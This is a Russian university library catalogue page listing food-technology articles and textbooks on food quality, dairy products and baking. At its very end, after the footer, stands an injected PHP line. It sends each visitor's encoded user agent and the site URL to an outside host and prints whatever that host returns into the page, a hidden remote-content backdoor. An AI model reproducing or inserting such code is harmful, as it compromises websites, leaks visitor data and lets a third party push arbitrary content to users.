  • Котова, Т. И. Современные тенденции развития рынка предприятии общественного питания г. Магнитогорска / Т. И. Котова, И. А. Долматова, В. Ф. Рябова. - с.34-41
    Кл. слова: ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ
  • Кузьменко, С. П. Реализация системы управления качеством продукции в Сибирском регионе / С. П. Кузьменко, М. А. Тарасова, М. А. Шадрин. - с.41-43
    Кл. слова: УПРАВЛЕНИЕ КАЧЕСТВОМ ПРОДУКЦИИ, СИБИРЬ
  • Кусаинова, Д. А. Гастрономические особенности китайской кухни / Д. А. Кусаинова. - с.44-45
    Кл. слова: КУХНЯ КИТАЙСКАЯ
  • Мустакова, М. М. О необходимости внедрения современных систем менеджмента на предприятия пищевой перерабатывающей промышленности стран таможенного союза / М. М. Мустакова. - с.46-49
    Кл. слова: ПРЕДПРИЯТИЕ ПИЩЕВОЙ ПРОМЫШЛЕННОСТИ, СОЮЗ ТАМОЖЕННЫЙ, МЕНЕДЖМЕНТ
  • Пестова, П. А. Личность в социальной системе управления сферы услуг / П. А. Пестова. - с.49-54
    Кл. слова: СФЕРА УСЛУГ
  • Плаксина, Н. Н. Изучение аминокислотного состава блюд студенческих столовых / Н. Н. Плаксина, Н. И. Барышникова. - с.54-57
    Кл. слова: АМИНОКИСЛОТА, СТОЛОВАЯ СТУДЕНЧЕСКАЯ
  • Платова, А. В. Применение кейтеринга в Омском регионе на примере банкетного зала "Анна" / А. В. Платова, М. С. Мальцева, М. А. Шадрин. - с.57-59
    Кл. слова: КЕЙТЕРИНГ
  • Репин, М. Н. Характеристика рынка торгового оборудования Омского региона / М. Н. Репин, М. А. Шадрин. - с.59-62
    Кл. слова: ОБОРУДОВАНИЕ ТОРГОВОЕ, ОМСКАЯ ОБЛАСТЬ
  • Рождественская, Л. Н. Целеполагание в системе управления качеством услуг социального питания / Л. Н. Рождественская. - с.62-71
    Кл. слова: ПИТАНИЕ СОЦИАЛЬНОЕ, УПРАВЛЕНИЕ КАЧЕСТВОМ ПИТАНИЯ, КАЧЕСТВО ПИТАНИЯ
  • Седельникова, Д. С. Организация и технология диетического питания в гостиничных комплексах / Д. С. Седельникова. - с.72-74
    Кл. слова: ПИТАНИЕ ДИЕТИЧЕСКОЕ, ГОСТИНИЦА - ПИТАНИЕ
  • Турлубаева, А. Н. Обеспечение качества и безопасности пищевых продуктов / А. Н. Турлубаева, С. В. Стадникова. - с.74-78
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Хлононских, Н. А. Особенности обслуживания тематических мероприятий / Н. А. Хлононских. - с.78-81
    Кл. слова: ОБСЛУЖИВАНИЕ МЕРОПРИЯТИЙ
  • Янушкевич, К. А. Роль международных стандартов в обеспечении качества и безопасности пищевых продуктов / К. А. Янушкевич, Н. А. Смирнова. - с.81-84
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Алексеева, Г. В. Способы повышения качества кондитерских изделий на жировой основе / Г. В. Алексеева, И. А. Ивкова. - с.86-90
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ, ВАФЛИ
  • Аникина, Е. Н. Актуальность разработки молочно-злаковых продуктов / Е. Н. Аникина. - с.91-94
    Кл. слова: ПРОДУКТЫ МОЛОЧНО-ЗЛАКОВЫЕ
  • Аникина, Е. Н. Перспективы использования пребиотиков в производстве ферментированных молочных продуктов / Е. Н. Аникина, О. В. Пасько. - с.94-98
    Кл. слова: ПРЕБИОТИКИ
  • Аралбаева, Г. Д. Индустриальные технологии в производстве молочных продуктов на примере ООО «Молочный завод "Лузинский" / Г. Д. Аралбаева, А. Б. Лобкова. - с.98-101
    Кл. слова: МОЛОКО, ЗАВОД МОЛОЧНЫЙ ЛУЗИНСКИЙ
  • Банадысева, И. Д. Особенности формирования потребительского восприятия инноваций в общественном питании / И. Д. Банадысева, Л. Н. Рождественская. - с.98-101
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ - ИННОВАЦИИ, ВОСПРИЯТИЕ ПОТРЕБИТЕЛЬСКОЕ
  • Беспалова, Т. А. Гармонизации стандартов продуктов питания / Т. А. Беспалова, О. А. Приступа. - с.107-113
    Кл. слова: СТАНДАРТЫ ПРОДУКТОВ ПИТАНИЯ
  • Васильева, В. Э. Функциональный наполнитель в хлебопечении / В. Э. Васильева. - с.113-116
    Кл. слова: ХЛЕБ, НАПОЛНИТЕЛИ ХЛЕБА
  • Вилемсон, Е. М. Разработка мороженого с пробиотическими свойствами / Е. М. Вилемсон, О. В. Пасько. - с.116-120
    Кл. слова: МОРОЖЕНОЕ
  • Воронкова, М. Н. Зависимость показателей качества хлеба пшеничного от показателей качества зерна пшеницы / М. Н. Воронкова. - с.120-125
    Кл. слова: КАЧЕСТВО ХЛЕБА, КАЧЕСТВО ЗЕРНА, ХЛЕБ
  • Воронова, Е. А. Производство функциональных продуктов на предприятии ООО "Сибирский молочный комбинат" / Е. А. Воронова, Н. И. Захарчснко, А. Г. Анацкая. - с.125-131
    Кл. слова: БИФИДИН
  • Вотинцев, Ю. П. Производство творожных продуктов методом ультрафильтрации / Ю. П. Вотинцев. - с.132-134
    Кл. слова: ПРОДУКТ ТВОРОЖНЫЙ, МЕТОД УЛЬТРАФИЛЬТРАЦИИ
  • Выставной, И. А. Изучение процесса ферментации сливочной основы ассоциациями микроорганизмов / И. А. Выставной. - с.134-140
    Кл. слова: ФЕРМЕНТАЦИЯ, МИКРООРГАНИЗМ
  • Гаврилова, Ю. А. Использование зимологических индикаторов при контроле качества пищевой продукции микробиологическими методами / Ю. А. Гаврилова. - с.141-144
    Кл. слова: ИНДИКАТОР ЗИМОЛОГИЧЕСКИЙ
  • Гатауллина, Ю. Р. Батончики мюсли повышенной биологической ценности на соево-злаковой основе / Ю. Р. Гатауллина. - с.144-147
    Кл. слова: МЮСЛИ, БАТОНЧИКИ МЮСЛИ
  • Герунов, Т. В. Пестициды - потенциальная угроза качеству продуктов питания / Т. В. Герунов, А. П. Козлов, А. В. Леушин. - с.147-150
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ - ПЕСТИЦИДЫ
  • Гончарова, Т. С. Современные способы повышения качества пищевых продуктов / Т. С. Гончарова. - с.150-153
    Кл. слова: КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ
  • Дудко, В. В. Современные индустриальные технологии пищевых продуктов / В. В. Дудко, В. А. Кузнецова. - с.153-156
    Кл. слова: ТЕХНОЛОГИЯ ПИЩЕВЫХ ПРОИЗВОДСТВ, ПРОИЗВОДСТВО ПИЩЕВОЕ
  • К вопросу о создании обогащенных продуктов питания / ; Ю. В. Евпатченко, [и др.]. - с.156-160
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ ОБОГАЩЕННЫЕ
  • Оценка безопасности продуктов питания посредством показателя активности воды / ; Ю. В. Евпатченко, [и др.]. - с.160-164
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДУКЦИИ ПИЩЕВОЙ
  • Есипова, М. С. Разработка новых рецептур пудинга творожного с плодово-ягодными наполнителями для питания школьников / М. С. Есипова. - с.164-168
    Кл. слова: ПУДИНГ ТВОРОЖНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Ефремова, О. М. Отруби как функциональная добавка в хлебобулочных изделиях / О. М. Ефремова. - с.169-171
    Кл. слова: ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ
Держатели документа (Информация об экземплярах) 
17. 
Позняковский В. М. Безопасность продовольственных товаров (с основами нутрициологии) [Текст] / В. М. Позняковский, 2015. - 270 с.
Ключевые слова 
БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- НУТРИЦИОЛОГИЯ -- ПИТАНИЕ - НАУКА -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ СБАЛАНСИРОВАННОЕ -- ПРОДУКТЫ СПЕЦИАЛЬНОГО НАЗНАЧЕНИЯ -- НОРМА ПОТРЕБЛЕНИЯ ПИЩИ -- ПИТАНИЕ - ЗДОРОВЬЕ -- ЗАГРЯЗНЕНИЕ ПРОДОВОЛЬСТВЕННОГО СЫРЬЯ -- ИНТОКСИКАЦИЯ -- ТОКСИКОИНФЕКЦИЯ -- МИКОТОКСИНЫ -- ЗАГРЯЗНЕНИЕ ХИМИЧЕСКОЕ -- ВЕЩЕСТВО АНТИБАКТЕРИАЛЬННОЕ -- ПРЕПАРАТ ГОРМОНАЛЬНЫЙ -- ДОБАВКА КОРМОВАЯ АЗОТСОДЕРЖАЩАЯ -- ЗАГРЯЗНЕНИЕ ТОКСИЧЕСКОЕ -- ПЕСТИЦИДЫ -- РЕГУЛЯТОР РОСТА РАСТЕНИЙ -- УДОБРЕНИЕ -- ВОДЫ СТОЧНЫЕ -- НИТРАТЫ -- ЗАГРЯЗНЕНИЕ РАДИОАКТИВНОЕ -- ДОБАВКА ПИЩЕВАЯ -- КОНСЕРВАНТ ПИЩЕВОЙ -- БАД -- ПРОДУКТ ГЕНЕТИЧЕСКИ МОДИФИЦИРОВАННЫЙ -- ГМИ -- ФАЛЬСИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТОВ -- БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СТАНДАРТ МЕЖДУНАРОДНЫЙ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ
Держатели документа (Информация об экземплярах) 
18. 
Товароведение и экспертиза потребительских товаров [Текст] / В. В. Шевченко [и др.] ; рук. работы В. В. Шевченко, 2014. - 751 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ЭКСПЕРТИЗА ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- КЛАССИФИКАЦИЯ ТОВАРА -- КОДИРОВАНИЕ ТОВАРА -- СОСТАВ ХИМИЧЕСКИЙ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ВОДА -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- УГЛЕВОДЫ -- ЛИПИДЫ -- ЖИРЫ -- ЛИПОИДЫ -- ВЕЩЕСТВА АЗОТСОДЕРЖАЩИЕ -- ВИТАМИН -- ФЕРМЕНТ -- КИСЛОТА ОРГАНИЧЕСКАЯ -- КОНСЕРВИРОВАНИЕ ПИЩЕВЫХ ПРОДУКТОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- МАРКИРОВКА ПИЩЕВОЙ ПРОДУКЦИИ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПЛОДЫ СВЕЖИЕ -- ЯГОДЫ -- ОРЕХИ -- ОВОЩИ -- ТОВАРЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ВИНО ВИНОГРАДНОЕ -- БРЕНДИ -- КОНЬЯК -- ИЗДЕЛИЯ ТАБАЧНЫЕ -- КРАХМАЛ -- КРАХМАЛОПРОДУКТЫ -- САХАР -- ЗАМЕНИТЕЛЬ САХАРА -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- СЛАДОСТИ ВОСТОЧНЫЕ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- МОЛОКО -- КОНСЕРВЫ МОЛОЧНЫЕ -- СЫР -- МАСЛО -- МОРОЖЕНОЕ -- ЖИРЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ ПИЩЕВЫХ ЖИРОВ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИР ТОПЛЕНЫЙ -- МАРГАРИН -- МАЙОНЕЗ -- ТОВАРОВЕДЕНИЕ МЯСНЫХ ПРОДУКТОВ -- МЯСО -- МЯСО ПТИЦЫ -- КОНСЕРВЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ТОВАРОВЕДЕНИЕ РЫБНЫХ ПРОДУКТОВ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ИКРА -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- МОРЕПРОДУКТЫ
Держатели документа (Информация об экземплярах) 
19. 
Введение в технологию продуктов питания [Текст] / ред. А. П. Нечаев, 2013. - 711 с.
Ключевые слова 
ПИТАНИЕ - ЗДОРОВЬЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- МИКРОБИОЛОГИЯ ПИЩЕВЫХ ПРОДУКТОВ -- ФЕРМЕНТЫ - ПИТАНИЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ - Сырье -- ДОБАВКА ПИЩЕВАЯ -- АРОМАТИЗАТОР ПИЩЕВОЙ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- Технология хлебобулочных изделий -- Технология муки -- Технология крупы -- Технология макаронных изделий -- Технология сахара -- Технология крахмала -- Технология крахмалопродуктов -- Технология кондитерских изделий -- Технология растительных масел -- Технология жиров -- Технология солода -- Технология этилового спирта -- Технология пива -- Технология кваса -- Кислота органическая -- Технология хлебопекарных дрожжей -- Технология ликероводочных изделий -- Технология виноградных вин -- КОНСЕРВИРОВАНИЕ ПИЩЕВЫХ ПРОДУКТОВ -- Технология безалкогольных напитков -- Технология функциональных пищевых продуктов -- БЕЗОПАСНОСТЬ ПРОДУКЦИИ ПИЩЕВОЙ -- БАКАЛАВР - Технолог

В учебном пособии изложен материал курса "Введение в пищевые технологии" для бакалавров, обучающихся по технологическим специальностям в вузах, готовящих специалистов для пищевой и перерабатывающей промышленности. Рассматриваются основные вопросы, связанные с ролью питания в жизни человека, научные основы пищевых технологий, а также сведения, относящиеся к области пищевых технологий: описание сырья, технологических процессов, требования к качеству готовых изделий. В специальных главах даны современные представления о пищевых и биологически активных добавках, ароматизаторах, технологических вспомогательных средствах. Отдельные главы посвящены продуктам здорового питания (функциональным пищевым продуктам) и безопасности пищевых продуктов.

Материал учебного пособия предназначен для студентов вузов, обучающихся по направлениям" Продукты питания из растительного сырья", "Технология продукции и организация общественного питания", "Технология детского и функционального питания" . Книга также будет полезна магистрам, аспирантам и специалистам, заинтересованным в данной проблематике.

20. 
Товароведение продовольственных товаров [Текст] : Уч.пособие / Л. А. Боровикова, В. А. Герасимова, А. М. Евдокимов, 1988. - 352 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- СОСТАВ ХИМИЧЕСКИЙ ПРОДУКТОВ -- ПОЛЕЗНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СТАНДАРТИЗАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КЛАССИФИКАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ХРАНЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- КОНСЕРВИРОВАНИЕ ПРОДТОВАРОВ -- ПОТЕРИ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- МИКРОБИОЛОГИЯ ПИЩЕВЫХ ПРОДУКТОВ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ОВОЩИ -- ПЛОДЫ -- ГРИБЫ -- ТОВАРЫ ВКУСОВЫЕ -- КРАХМАЛ -- САХАР -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- ТОВАРЫ МОЛОЧНЫЕ -- МЯСО -- ТОВАРЫ РЫБНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- РЫБА -- ТОВАРЫ РЫБНЫЕ -- ИКРА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3148 - 22.01.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.64 с.28 запросов, 1.14c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;